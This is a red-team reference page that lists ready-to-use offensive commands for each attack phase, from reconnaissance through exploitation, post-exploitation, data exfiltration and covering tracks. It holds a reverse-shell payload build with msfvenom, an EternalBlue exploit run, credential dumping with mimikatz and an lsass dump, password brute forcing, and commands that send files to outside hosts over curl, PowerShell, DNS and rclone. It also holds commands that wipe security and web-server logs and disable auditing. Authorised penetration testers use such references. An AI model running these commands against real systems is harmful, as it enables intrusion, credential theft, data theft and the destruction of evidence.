This page is a comprehensive reference tool for Red Teamers. It provides a detailed roadmap with 20+ tools and commands per category, organized into the following sections: Reconnaissance and Enumeration: Identify and gather information about the target. Vulnerability Scanning: Detect vulnerabilities in services and systems. Exploitation: Exploit vulnerabilities to gain initial access. Post-Exploitation: Maintain access, escalate privileges, and move laterally. Data Exfiltration: Stealthily extract sensitive data. Covering Tracks: Remove evidence and cover tracks to avoid detection. Each category includes a clear description and practical examples of commands and tools, ready to use in penetration testing and Red Team operations.
Identify and gather information about the target, such as domains, subdomains, IP addresses, exposed services, and potential attack vectors.
nmap -sV -sC -oA scan_result 192.168.1.1
recon-ng -m recon/domains-hosts/brute_hosts
amass enum -d example.com
sublist3r -d example.com
shodan host 192.168.1.1
theHarvester -d example.com -b all
dnsenum example.com
masscan 192.168.1.1 -p1-65535 --rate=1000
whois example.com
dig example.com ANY
netdiscover -i eth0 -r 192.168.1.0/24
fierce -dns example.com
maltego
spiderfoot -l
aquatone-discover -d example.com
assetfinder example.com
findomain -t example.com
knockpy example.com
cat domains.txt | httprobe
waybackurls example.com
Identify vulnerabilities in exposed services and systems.
nessuscli scan --target 192.168.1.1
openvas-cli --target 192.168.1.1
nikto -h http://example.com
zap-cli quick-scan -o -r http://example.com
burpsuite
wapiti -u http://example.com
wpscan --url http://example.com
sqlmap -u http://example.com/page?id=1 --dbs
xsstrike -u http://example.com
dirb http://example.com
gobuster dir -u http://example.com -w wordlist.txt
nuclei -u http://example.com
retire --path /var/www/html
lynis audit system
skipfish -o output http://example.com
arachni http://example.com
vega
acunetix
netsparker
Exploit identified vulnerabilities to gain initial access.
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.1
exploit
sqlmap -u http://example.com/page?id=1 --dbs
crackmapexec smb 192.168.1.1 -u admin -p password
hydra -l admin -P passwords.txt ssh://192.168.1.1
john --wordlist=passwords.txt hash.txt
hashcat -m 1000 hash.txt passwords.txt
responder -I eth0
python3 smbclient.py -h 192.168.1.1
powershell-empire
teamserver 192.168.1.1 password
beef
setoolkit
searchsploit apache 2.4.29
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o payload.exe
veil-evasion
shellter
Invoke-Mimikatz -DumpCreds
mimikatz.exe privilege::debug sekurlsa::logonpasswords
bloodhound-python -d example.com -u user -p password
Maintain access, escalate privileges, and move laterally within the network.
mimikatz.exe privilege::debug sekurlsa::logonpasswords
Invoke-Mimikatz -DumpCreds
bloodhound-python -d example.com -u user -p password
powershell-empire
teamserver 192.168.1.1 password
meterpreter > getuid
psexec \\192.168.1.1 -u admin -p password cmd.exe
wmic /node:192.168.1.1 process call create "cmd.exe"
python3 psexec.py admin:password@192.168.1.1
nc -lvp 4444
ssh user@192.168.1.1
xfreerdp /u:admin /p:password /v:192.168.1.1
procdump.exe -ma lsass.exe lsass.dmp
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
laZagne.exe all
wce.exe -w
meterpreter > hashdump
Invoke-AllChecks
Invoke-PrivescCheck -Extended
Extract sensitive data from the target stealthily.
dnscat2-server --secret=mysecret
nc -lvp 4444 > file.txt
rclone copy sensitive_data remote:backup
scp user@192.168.1.1:/path/to/file .
sftp user@192.168.1.1
python3 -m http.server 8080
ftp 192.168.1.1
icmp-exfil -i eth0 -f file.txt
dns-exfil -d example.com -f file.txt
sendemail -f from@example.com -t to@example.com -u "Subject" -m "Body" -a file.txt
aws s3 cp file.txt s3://mybucket/
torsocks curl -X POST -d @file.txt http://example.com
cadaver http://example.com/webdav
ssh -L 8080:localhost:80 user@192.168.1.1
meterpreter > download file.txt
Invoke-WebRequest -Uri http://example.com -Method POST -Body (Get-Content file.txt)
base64 file.txt
steghide embed -cf image.jpg -ef file.txt
zip -r archive.zip file.txt
openssl enc -aes-256-cbc -salt -in file.txt -out file.enc
Remove evidence of the attack and cover tracks to avoid detection.
timestomp file.txt -m "01/01/2023 00:00:00"
ccleaner.exe /AUTO
bleachbit
shred -u file.txt
rm -rf file.txt
wevtutil cl Security
del /f /q C:\Windows\System32\LogFiles\*.*
del /f /q C:\inetpub\logs\LogFiles\*.*
rm -rf /var/log/apache2/*
rm -rf /var/log/nginx/*
sysmon -u
auditctl -D
netsh advfirewall reset
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Backdoor
schtasks /delete /tn "Backdoor"
rm -rf ~/.ssh/known_hosts
history -c
Clear-History
meterpreter > clearev